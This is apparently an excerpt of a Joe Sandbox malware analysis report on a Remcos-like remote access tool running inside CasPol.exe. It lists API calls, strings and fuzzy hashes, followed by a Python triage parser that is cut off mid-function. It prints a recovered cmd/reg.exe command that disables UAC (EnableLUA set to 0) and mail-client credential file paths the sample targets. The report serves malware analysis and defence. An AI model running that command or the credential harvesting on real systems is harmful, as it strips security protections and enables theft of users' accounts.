• Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                                                                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 221034970-0
                                                                                                                                                                          • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                                                                                          • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                                                                                                          • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                                                                                          • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                                                                                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 221034970-0
                                                                                                                                                                          • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                                                                                          • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                                                                                                          • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                                                                                          • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                                                                                                          APIs
                                                                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                                                                                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 221034970-0
                                                                                                                                                                          • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                                                                                          • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                                                                                                          • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                                                                                          • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                                                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                                                                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                                                                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                          • API String ID: 4036392271-1520055953
                                                                                                                                                                          • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                          • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                                                                          • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                                          • String ID: 0$MsgWindowClass
                                                                                                                                                                          • API String ID: 2877667751-2410386613
                                                                                                                                                                          • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                                                                                          • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                                                                                                                          • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                                                                                          • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                                                                                                          Strings
                                                                                                                                                                          • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                                                                                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle$CreateProcess
                                                                                                                                                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                                          • API String ID: 2922976086-4183131282
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
• GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
• FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
• GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B6C
• FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
Strings
Memory Dump Source
• Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
• CloseHandle.KERNEL32(?), ref: 00405140
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
• String ID: KeepAlive | Disabled
• API String ID: 2993684571-305739064
APIs
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
• PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
• Sleep.KERNEL32(00002710), ref: 0041AE98
• PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: PlaySound$HandleLocalModuleSleepTime
• String ID: Alarm triggered
• API String ID: 614609389-2816303416
APIs
• GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
• GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
• SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
• SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
Strings
• ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Console$AttributeText$BufferHandleInfoScreen
• String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
• API String ID: 3024135584-2418719853
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
• WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
• WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
• _free.LIBCMT ref: 0044943D
  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
• _free.LIBCMT ref: 00449609
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
• String ID:
• API String ID: 1286116820-0
                                                                                                                                                                          • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                                                                                                          • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                                                                                                                                          • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                                                                                                          • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
APIs
  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
• Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
• CloseHandle.KERNEL32(00000000), ref: 0040FB40
  • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,h]v), ref: 0041C08B
  • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,h]v), ref: 0041C096
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
• String ID:
• API String ID: 2180151492-0
• Opcode ID: 5e635ca273bbaf4b6633853c1879682a44097072eebb318f7e766faded892b56
• Instruction ID: 39de0d33b69ea9088fa68d935cf3ef43cf04ff0480c7130c1a021fac56d243da
• Opcode Fuzzy Hash: 5e635ca273bbaf4b6633853c1879682a44097072eebb318f7e766faded892b56
• Instruction Fuzzy Hash: 8D4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
APIs
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
• Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
• Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
• Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
• __alloca_probe_16.LIBCMT ref: 00451231
• MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
• GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
• __freea.LIBCMT ref: 0045129D
  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
• String ID:
• API String ID: 313313983-0
• Opcode ID: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
• Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
• Opcode Fuzzy Hash: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
• Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
APIs
  • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
  • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
  • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
• Sleep.KERNEL32(00000BB8), ref: 004127B5
Strings
Memory Dump Source
• Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseOpenQuerySleepValue
• String ID: exepath$h]v$hev$xtv
• API String ID: 4119054056-131525599
• Opcode ID: b1c708b36fa724e52661caa0efcea8b4379a0a4ada5948ef7cbd54432e038acd
• Instruction ID: 7f535f989f64e3217726da85717e45219a172cbdcd35e6ae3f2d68e0f7be43ad
• Opcode Fuzzy Hash: b1c708b36fa724e52661caa0efcea8b4379a0a4ada5948ef7cbd54432e038acd
• Instruction Fuzzy Hash: 1F21D8A1B043042BD604B7365D4AAAF724D8B80358F40897FBA56E73D3EEBD9C45826D
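The per-function records on this page are flat text, which makes it awkward to pivot on the fields that matter during triage: the API set, the literal constants passed to those APIs, the strings, and the Instruction Fuzzy Hash used to match functions across samples. The Python below is an added example, not Joe Sandbox code and not part of this report. It parses records in the layout used on this page into dictionaries, decodes the constants a practitioner would otherwise look up by hand (80000001 is HKEY_CURRENT_USER and 00020019 is KEY_READ in the RegOpenKeyExA call; 00000400 in OpenProcess is PROCESS_QUERY_INFORMATION; 00000002 in CreateToolhelp32Snapshot is TH32CS_SNAPPROCESS; 00000BB8 in Sleep is 3000 ms), and tags each function by the capability its API set implies, so the process-enumeration function and the HKCU lookup that sits next to the string exepath can be picked out mechanically. The SAMPLE text is constructed from two of the records shown above (trimmed to the lines the parser needs); the tag names and the constant table are this example's own choices.

```python
"""Parse Joe Sandbox per-function records into structured data and tag capabilities.
Added example for this report, not Joe Sandbox code: SAMPLE is constructed from two records
in the layout used on this page; constant names are taken from the Windows SDK headers."""
import re

SAMPLE = """\
APIs
  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
  • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,h]v), ref: 0041C08B
Similarity
• API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
• String ID:
• Instruction Fuzzy Hash: 8D4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
APIs
  • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
  • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
• Sleep.KERNEL32(00000BB8), ref: 004127B5
Similarity
• API ID: CloseOpenQuerySleepValue
• String ID: exepath$h]v$hev$xtv
• Instruction Fuzzy Hash: 1F21D8A1B043042BD604B7365D4AAAF724D8B80358F40897FBA56E73D3EEBD9C45826D
"""

# API call line: optional "Part of subcall function XXXXXXXX:" prefix, Name.MODULE, optional
# argument list (absent for lines like "_free.LIBCMT ref: ..."), then "ref: XXXXXXXX".
CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$")
KV_RE = re.compile(r"•\s*(?P<key>[A-Za-z ]+?):\s?(?P<val>.*)$")  # "API ID: ...", "String ID: ..." etc.

HKEY_NAMES = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
PROCESS_ACCESS = {0x0008: "PROCESS_VM_OPERATION", 0x0020: "PROCESS_VM_WRITE",
                  0x0400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}


def parse_records(text):
    """Start a new record at every "APIs" header; collect its call lines and key/value fields."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"calls": [], "meta": {}}
            records.append(cur)
        elif cur is not None and (m := CALL_RE.match(line)):
            call = m.groupdict()
            call["args"] = call["args"].split(",") if call["args"] else []
            cur["calls"].append(call)
        elif cur is not None and (m := KV_RE.match(line)):
            cur["meta"][m["key"]] = m["val"].strip()
    return records


def _literal(arg):
    """Integer value of an 8-hex-digit literal argument; None for '?' and symbolic arguments."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-F]{8}", arg) else None


def decode_constants(call):
    """Name the well-known constants in the calls that matter for triage; {} when not applicable."""
    args, name = call["args"], call["name"]
    first = _literal(args[0]) if args else None
    if first is None:
        return {}
    if name == "OpenProcess":
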